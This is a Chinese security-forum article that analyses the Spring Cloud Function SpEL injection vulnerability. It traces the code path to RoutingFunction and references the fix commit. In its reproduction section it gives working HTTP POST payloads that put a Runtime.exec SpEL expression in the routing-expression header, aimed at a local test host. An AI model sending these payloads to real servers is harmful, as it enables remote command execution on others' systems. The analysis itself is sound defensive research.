问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
Spring Cloud Function SPEL表达式注入漏洞
漏洞分析
Spring Cloud Function 是基于 Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。Spring Cloud Function 被爆出了 SPEL 表达式注入漏洞
0x01 漏洞简介 ========= Spring Cloud Function 是基于 Spring Boot 的函数计算框架,它抽象出所有传输细节和基础架构,允许开发人员保留所有熟悉的工具和流程,并专注于业务逻辑。Spring Cloud Function 被爆出了 SPEL 表达式注入漏洞 通过查看提交的 commit 确定漏洞最终的 sink <https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f> data:image/s3,"s3://crabby-images/7cfff/7cfff6b9d16619bf78f36fa308ee5ab9ede6a98e" alt="image-20220328114504-eawmy5r.png" data:image/s3,"s3://crabby-images/7f9b0/7f9b0cf10fe8573c959aca55e09d5737713eb3c9" alt="image-20220328142245-rhhzd2f.png" 0x02 漏洞分析 ========= `org.springframework.cloud.function.web.flux.FunctionController#postStream` data:image/s3,"s3://crabby-images/82b9d/82b9d157ea8ed69b148e084423aeb184f6adcda2" alt="image-20220328152006-sfpe1w7.png" `org.springframework.cloud.function.web.mvc.FunctionController#form` data:image/s3,"s3://crabby-images/f2412/f2412003a6093d11ef89b958ff43e4d1b59dda92" alt="image-20220328152230-j4i0m87.png" 通过两个入口可以触发漏洞 先关注漏洞原理 SPEL 注入的实例 ```java ExpressionParser parser = new SpelExpressionParser(); Expression exp = parser.parseExpression("T(java.lang.Runtime).getRuntime().exec(\\"calc.exe"\\")"); Object value = exp.getValue(); ``` SPEL 注入最终触发的位置 `org.springframework.cloud.function.context.config.RoutingFunction#functionFromExpression` data:image/s3,"s3://crabby-images/8ec65/8ec65d90ca63f73fd5eb9aea8075801bc5fcdc99" alt="image-20220328154830-w6ymtvb.png" 向上跟踪,发现调用且第一个参数可控的位置 `org.springframework.cloud.function.context.config.RoutingFunction#route` data:image/s3,"s3://crabby-images/1b945/1b94586ccdc27c0bc231fe3eb11828ef0da3b248" alt="image-20220328155407-iho6y73.png" 参数来自请求头中 `spring.cloud.function.routing-expression` 的值 `org.springframework.cloud.function.context.config.RoutingFunction#apply` data:image/s3,"s3://crabby-images/76c08/76c0820fcc2ed60457c6b71eb6db6b53b97b13d5" alt="image-20220328155553-paoxbzi.png" `RoutingFunction` 是 `Function` 的接口,所以要想办法触发到 `RoutingFunction` <https://docs.spring.io/spring-cloud-function/docs/3.2.0/reference/html/spring-cloud-function.html#> data:image/s3,"s3://crabby-images/3090c/3090c8b822b1cdc9d2b5cf6e0ac26960b9a7cdf5" alt="image-20220328161312-gqfrtlv.png" 在官方文档中也提及到了允许 `spring.cloud.function.routing-expression` 来执行 SPEL 表达式 data:image/s3,"s3://crabby-images/24a82/24a82ed78f1baf8bc0d066b69f30eb269f0382e6" alt="image-20220328165011-tg8xfsv.png" 可以通过在配置文件中添加 `spring.cloud.function.definition=functionRouter` 来实现访问不存在的路由时调用 `RoutingFunction` 当通过 POST 传送数据时 `org.springframework.cloud.function.web.mvc.FunctionController#post` data:image/s3,"s3://crabby-images/045ca/045cacf7a31193bb8fa3349be98a2da3fc94f5e9" alt="image-20220328174102-gzeoug6.png" `org.springframework.cloud.function.web.util.FunctionWebRequestProcessingHelper#processRequest` data:image/s3,"s3://crabby-images/23954/23954a36cdc7d71ad4c51a1e993c69060dc4480d" alt="image-20220328174431-atbqrsu.png" `org.springframework.cloud.function.context.catalog.SimpleFunctionRegistry.FunctionInvocationWrapper#apply` data:image/s3,"s3://crabby-images/1205b/1205b925c945307195c030e5bc686bc2487c04e2" alt="image-20220328174453-9th14m6.png" `org.springframework.cloud.function.context.catalog.SimpleFunctionRegistry.FunctionInvocationWrapper#doApply` data:image/s3,"s3://crabby-images/aa9b1/aa9b1a33132753a45855e1ad1a471501234aabd7" alt="image-20220328174526-2zirlf0.png" `org.springframework.cloud.function.context.config.RoutingFunction#apply` data:image/s3,"s3://crabby-images/ac1c4/ac1c40e214facc2231c1621ca056e0a2439fd6e7" alt="image-20220328174625-ukjq7hi.png" `org.springframework.cloud.function.context.config.RoutingFunction#route` data:image/s3,"s3://crabby-images/e1ba6/e1ba61e0aa8f48e55d5f394ac0391c63e31f9a65" alt="image-20220328174655-hguduil.png" 简单的分析完成之后,仍然存在大量的疑问和不理解的地方,又看到可以不通过配置文件来实现RCE,于是决定再进一步进行分析 0x03 漏洞再分析 ========== 发现通过特定的路由可以直接实现RCE `functionRouter` 当不修改配置文件,向路由 `functionRouter` 发送请求时 `org.springframework.cloud.function.web.mvc.FunctionHandlerMapping#getHandlerInternal` data:image/s3,"s3://crabby-images/8fa17/8fa170fc0276efb307db79804d3c234361b218bf" alt="image-20220329155249-0fzipdu.png" `org.springframework.cloud.function.web.util.FunctionWebRequestProcessingHelper#findFunction` data:image/s3,"s3://crabby-images/9f5fe/9f5fe6464e3160c5a59b2081fc99a2127e62aed7" alt="image-20220329155313-736xdkm.png" 我们可以看到在通过 POST 请求时,会去根据 path 的值,去获取 `function` `org.springframework.cloud.function.web.util.FunctionWebRequestProcessingHelper#doFindFunction` data:image/s3,"s3://crabby-images/599ea/599eab829118674cdd129c3d535fff0f17c6e298" alt="image-20220329155656-38oml8x.png" `org.springframework.cloud.function.context.FunctionCatalog#lookup(java.lang.String, java.lang.String...)` data:image/s3,"s3://crabby-images/30c95/30c954c26b731adc73521bc2d4023f347a97babb" alt="image-20220329155414-9x3ua5h.png" 如果获取的值为空,还可以去读取本身配置中的 `functionDefinition` 来代替 name 去再执行获取 function 的值 所以设定 配置文件 `spring.cloud.function.definition=functionRouter` 与直接请求路由 `functionRouter` 效果是一样的,获得的 function 的值如下所示 data:image/s3,"s3://crabby-images/31149/31149b1805714b4a4c0b1c0e2cd47b47ea8f2bc3" alt="image-20220329160053-0p8dfjm.png" 之后的分析就跟前面对上了。 0x04 漏洞复现 ========= ```php POST /functionRouter HTTP/1.1 Host: 127.0.0.1:8088 spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("calc.exe") Content-Length: 1 1 ``` data:image/s3,"s3://crabby-images/e0c8e/e0c8ebde530297e69fc55555b8384ba0697eaa56" alt="image-20220329160318-zbi7wcw.png" ```php POST /1 HTTP/1.1 Host: 127.0.0.1:8088 spring.cloud.function.routing\-expression:T(java.lang.Runtime).getRuntime().exec("calc.exe") Content\-Length: 1 1 ``` data:image/s3,"s3://crabby-images/7f700/7f700070d4c2d0fa8bc8444bba685070a96725fa" alt="image-20220329160351-2ao19e1.png" 0x05 参考文章 ========= <https://segmentfault.com/a/1190000041611881> <https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f> <https://mp.weixin.qq.com/s/APiXRwSiEanoIuohjwkoEw> 且听安全 <https://hosch3n.github.io/2022/03/26/SpringCloudFunction>漏洞分析/ SpringCloudFunction漏洞分析 <https://mp.weixin.qq.com/s/U7YJ3FttuWSOgCodVSqemg> Spring Cloud Function v3.x SpEL RCE <https://mp.weixin.qq.com/s/sPPyso-WyPGnYYHeyL9DPA> Spring-Cloud-Function SPEL 注入漏洞的一点想法
发表于 2022-03-31 09:43:25
阅读 ( 5974 )
分类:
漏洞分析
0 推荐
收藏
0 条评论
请先
登录
后评论
xiangshou
1 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!